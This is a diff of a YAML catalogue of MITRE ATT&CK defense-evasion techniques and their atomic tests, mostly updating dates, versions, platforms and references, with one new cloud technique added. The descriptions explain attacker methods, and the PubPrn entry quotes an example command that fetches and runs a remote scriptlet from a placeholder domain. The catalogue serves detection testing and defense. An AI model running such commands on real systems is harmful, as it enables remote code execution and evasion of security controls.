-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -897,20 +879,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1578.004:
@@ -939,7 +958,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -966,8 +985,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -1009,7 +1026,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -1087,7 +1103,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests: []
   T1216.001:
@@ -1124,7 +1139,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -1143,7 +1158,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests:
     - name: PubPrn.vbs Signed Script Bypass
@@ -1252,7 +1266,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -1310,7 +1323,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests:
     - name: Read volume boot sector via DOS device path (PowerShell)
@@ -1341,9 +1353,85 @@ defense-evasion:
           Format-Hex -InputObject $buffer
         name: powershell
         elevation_required: true
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -1369,11 +1457,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -1418,12 +1505,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests: []
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1494,11 +1580,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -1566,7 +1651,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests: []
   T1036.007:
@@ -1597,7 +1681,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -1634,8 +1718,6 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests:
     - name: File Extension Masquerading
@@ -1713,7 +1795,7 @@ defense-evasion:
         name: command_prompt
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1814,7 +1896,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests:
     - name: Bypass UAC using Event Viewer (cmd)
@@ -2515,7 +2596,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -2549,13 +2630,11 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -2607,12 +2686,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -2692,7 +2770,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests:
     - name: UEFI Persistence via Wpbbin.exe File Creation
@@ -2713,7 +2790,7 @@ defense-evasion:
         elevation_required: true
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -2732,7 +2809,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -2746,7 +2822,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -2773,8 +2848,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -2805,7 +2880,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests:
     - name: Service Registry Permissions Weakness
@@ -2921,7 +2997,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -2974,7 +3049,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -2990,11 +3065,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -3040,8 +3114,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -3051,9 +3125,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests:
     - name: Masquerade as a built-in system executable
@@ -3110,7 +3183,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -3134,8 +3207,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -3199,11 +3270,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -3224,8 +3294,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -3269,7 +3339,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests:
     - name: Extract binary files via VBA
@@ -3406,7 +3475,7 @@ defense-evasion:
         elevation_required: false
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -3426,9 +3495,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -3448,9 +3522,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -3467,6 +3540,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -3500,7 +3577,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1562.009:
@@ -3550,7 +3626,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -3578,8 +3654,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests:
     - name: Safe Mode Boot
@@ -3633,7 +3707,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -3657,12 +3731,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -3752,13 +3824,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
